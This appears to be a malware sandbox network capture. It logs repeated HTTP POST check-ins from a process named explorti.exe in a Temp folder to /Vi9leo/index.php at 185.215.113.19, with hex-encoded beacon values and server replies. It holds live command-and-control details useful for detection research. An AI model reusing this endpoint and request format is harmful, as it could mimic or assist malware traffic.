Jul 26, 2024 13:54:29.404694080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.8	49770	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:29.415132999 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:30.166471004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.8	49771	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:30.287231922 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:31.044228077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.8	49773	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:31.063854933 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:31.830495119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.8	49774	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:31.957592964 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:32.851155043 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.8	49776	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:32.860205889 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:33.830468893 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.8	49777	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:33.942522049 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:34.707295895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:34.710623980 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:34.956218004 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.8	49778	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:35.066981077 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:36.007353067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.8	49779	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:36.020409107 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:36.823121071 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.8	49780	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:36.942100048 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:37.723232031 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.8	49781	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:37.732506037 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:38.702841043 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:54:38.705373049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
70	192.168.2.8	49782	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:38.815757036 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:39.592850924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.8	49783	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:39.604033947 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:40.353914976 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.8	49784	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:40.473913908 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:41.236354113 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.8	49785	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:41.245621920 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:42.355870962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:54:42.358198881 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.8	49786	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:42.472429037 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:43.257348061 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.8	49787	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:43.269349098 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:44.074141979 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.8	49788	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:44.207110882 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:45.267855883 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 13:54:45.269505978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.8	49789	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:45.276782036 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:46.059916019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.8	49790	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:46.206583977 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 13:54:46.944922924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.8	49791	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:46.953511000 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 36 37 35 42 35 35 42 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2675B55B82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 13:54:48.046267986 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Jul 26, 2024 13:54:48.049036980 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 11:54:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.8	49792	185.215.113.19	80	1152	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 13:54:48.164565086 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
